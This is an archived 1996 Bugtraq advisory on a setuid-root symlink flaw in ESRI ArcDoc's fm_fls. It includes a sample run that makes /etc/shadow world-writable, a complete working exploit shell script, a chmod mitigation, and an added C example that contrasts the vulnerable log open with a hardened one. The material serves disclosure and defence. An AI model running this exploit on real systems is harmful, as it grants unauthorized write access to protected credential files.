Bugtraq mailing list archives
Security problem in ESRI's ArcDoc 7.0.4
From: jwa () nbs nau edu (James W. Abendschan)
Date: Thu, 23 May 1996 21:21:46 -0700
*** GIS & ESRI/ARC/Info shops take note! ***

The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) add somewhat arbitrary data to any
file and (b) change the permissions of that file to rw-rw-rw-. fm_fls is
setuid root.

When fm_fls is executed, it opens up a logfile -- the default location for
this file is /tmp/fm_fls.log. Unfortunately, it doesn't check if this file
already exists or if this file has any symlinks attached to it. If for some
reason fm_fls gets bad arguments, it will write these bad arguments to the
logfile, chown the file to root, give the file 666 permissions, and exit.
If we make a link from this file to an unreadable file, we can both append
the contents of the logfile into the unreadable file and gain world rw
access to the file.

Sample run:
ecosys:~jwa/Security/Projects/r00tin> id
uid=200(jwa) gid=107(cpin)
ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
-rw-------   1 root     other       1851 May 23 20:22 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
fm.sploit of /etc/shadow yields:
-rw-rw-rw-   1 root     other       2011 May 23 20:38 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
mpm:xxxxxxxxxxxxx:6445::::::
ebp:xxxxxxxxxxxxx:6445::::::
sml:xxxxxxxxxxxxx:6445::::::
1996/05/23-20:38:32 BG woot ecosys #
1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
ecosys:~jwa/Security/Projects/r00tin>
Note the additional lines appended to the target file (in this case,
/etc/shadow). To fix this, either (a) yell at your vendor or (b)
chmod 555 `which fm_fls`. I don't yet know the effects of removing the
suid bit on fm_fls; I'd like to hear feedback on this. I've seen fm_fls
distributed with other applications -- perhaps the bug is not specific to
ARC/Info?

Comments are welcome.

James

#!/bin/sh
#
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
#
# fix: chmod 555 `which fm_fls`
#
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
#
# James Abendschan jwa () nbs nau edu 23 May 1996
#

# full path to the fm_fls executable
FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"

# the logfile fm_fls opens (and chowns/chmods) when given bad arguments
LOGFILE=/tmp/fm_fls.log
TMP=/tmp/exploit.$$
UNREADABLE=$1

if [ $# -ne 1 ]
then
    echo "usage: `basename $0` filename"
    exit 1
fi

rm -f "$LOGFILE"
if [ -f "$LOGFILE" ]
then
    echo "tried to remove $LOGFILE, but it still exists! Exploit won't work."
    exit 1
fi

# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..
ln -s "$UNREADABLE" "$TMP"
ln -s "$TMP" "$LOGFILE"

# any bogus argument makes fm_fls log an error through the symlink chain,
# then chown root / chmod 666 whatever the link resolves to
"$FM_FLS" woot

echo "`basename $0` of $UNREADABLE yields:"
ls -l "$UNREADABLE"

# all done, clean up.
rm -f "$TMP" "$LOGFILE"
exit 0

--
James W. Abendschan                              Email: jwa () nbs nau edu
UNIX Systems Programmer/Administrator            Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ Voice mail: *516
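The bug class here is a setuid program that opens a fixed, predictable path in a world-writable directory, follows whatever is sitting there, and then chowns/chmods the target by path. The following C program is an added illustration written for this archive page; it is not ESRI's code and not part of the original post. It reproduces the failure with a constructed scenario in a private temp directory (a "secret" file standing in for /etc/shadow, a symlink standing in for /tmp/fm_fls.log) and shows the hardened open a setuid program should use instead: O_NOFOLLOW on the final component, a tight create mode, and an fstat() check on the descriptor rather than a stat() on the path. It assumes a POSIX.1-2008 system with O_NOFOLLOW (Linux, modern Solaris); the Solaris 2.5 of the post predates that flag, which is why the author's chmod 555 mitigation was the practical fix at the time.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* The pattern the post describes fm_fls using: open a fixed path,
 * follow whatever is there, then chmod by path.  Returns an fd or -1. */
int naive_open_log(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0666);
    if (fd < 0)
        return -1;
    chmod(path, 0666);   /* by path: follows a planted symlink to its target */
    return fd;
}

/* Hardened open for a privileged program's log file.  O_NOFOLLOW makes a
 * symlink at the last component fail with ELOOP; mode 0600 never leaves a
 * world-writable window; fstat() on the descriptor (not stat() on the path)
 * confirms we hold a plain file owned by the expected uid with one link. */
int safe_open_log(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: <tmpdir>/secret plays /etc/shadow, <tmpdir>/fm_fls.log
 * is a symlink to it, as in the post.  Returns 0 when the naive open follows
 * the link, the hardened open refuses it with ELOOP, and the hardened open
 * succeeds once the link is gone; non-zero otherwise. */
int demo(void)
{
    char dir[] = "/tmp/fmfls_demo.XXXXXX";     /* name is an assumption */
    char secret[512], logp[512];
    int s, naive_fd, safe_fd, fresh_fd, err, ok;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(logp, sizeof logp, "%s/fm_fls.log", dir);

    s = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (s < 0)
        return -1;
    write(s, "root:x:0:0\n", 11);              /* stand-in shadow content */
    close(s);
    if (symlink(secret, logp) != 0)
        return -1;

    naive_fd = naive_open_log(logp);            /* opens secret through the link */
    safe_fd = safe_open_log(logp, getuid());
    err = errno;
    ok = (naive_fd >= 0 && safe_fd < 0 && err == ELOOP);
    if (naive_fd >= 0)
        close(naive_fd);

    unlink(logp);                               /* attacker's link removed ... */
    fresh_fd = safe_open_log(logp, getuid());   /* ... now a real 0600 file is created */
    ok = ok && fresh_fd >= 0;
    if (fresh_fd >= 0)
        close(fresh_fd);

    unlink(logp);
    unlink(secret);
    rmdir(dir);
    return ok ? 0 : 1;
}

int main(void)
{
    int rc = demo();
    printf("%s\n", rc == 0 ? "naive open followed the symlink; hardened open refused it (ELOOP)"
                           : "unexpected result");
    return rc == 0 ? 0 : 1;
}
```

Even with O_NOFOLLOW, a predictable name in a shared directory stays a weak design: an attacker can still pre-create a regular file there, so the fstat() ownership and link-count check is what actually protects the privileged writer, and the cleanest fix remains logging to a root-owned directory or dropping privileges before touching anything under /tmp.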
Current thread:
- Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 23)
- Re: Security problem in ESRI's ArcDoc 7.0.4 Andrew Raphael (May 24)
- <Possible follow-ups>
- Re: Security problem in ESRI's ArcDoc 7.0.4 Sven.Wijk (May 24)
- Re: Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 24)
- Re: Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 24)